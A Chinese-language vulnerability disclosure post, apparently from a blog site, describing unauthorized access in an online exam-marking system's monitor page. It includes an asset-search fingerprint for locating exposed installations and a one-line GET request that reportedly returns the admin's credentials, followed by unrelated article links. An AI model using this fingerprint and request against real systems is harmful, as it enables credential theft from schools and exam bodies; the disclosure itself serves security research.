【POC漏洞】XXX网上阅卷系统 monitor 未授权访问

*免责声明:本文仅供安全研究与学习之用,严禁使用本内容进行未经授权的违规渗透测试,遵守网络安全法,共同维护网络安全,违者后果自负。


一、漏洞说明

XXX网上阅卷系统是一款专为教育领域设计的在线阅卷工具,它能够帮助教师和考试机构实现高效、准确的试卷评阅。系统/exam/monitor/index,jsp存在未授权访问,远程攻击者可通过该接口获取用户账号与密码,造成信息泄露。

二、资产识别

资产特征:

复制代码
body="action=\"login_ok.jsp" && body="阅卷"

三、漏洞脚本

复制漏洞脚本:

复制代码
GET /exam/monitor/index.jsp?logname=admin  HTTP/1.1

漏洞效果:

相关推荐
福尔摩斯张3 小时前
Linux的pthread_self函数详解:多线程编程中的身份标识器(超详细)
linux·运维·服务器·网络·网络协议·tcp/ip·php
ArrebolJiuZhou3 小时前
02arm指令集(一)——LDR,MOV,STR的使用
linux·网络·单片机
一只旭宝3 小时前
Linux专题八:生产者消费者,读写者模型以及网络编程
linux·网络
代码游侠3 小时前
复习——网络基础知识
网络·笔记·网络协议·算法·http
wregjru3 小时前
【C++】2.4 map和set的使用
网络·网络协议·rpc
蒜丶4 小时前
基于 frp 0.65 tcp 模式,实现web服务&ssh服务内网穿透
网络
Kiyra4 小时前
LinkedHashMap 源码阅读
java·开发语言·网络·人工智能·安全·阿里云·云计算
PhDTool4 小时前
计算机化系统验证(CSV)的前世今生
数据库·安全·全文检索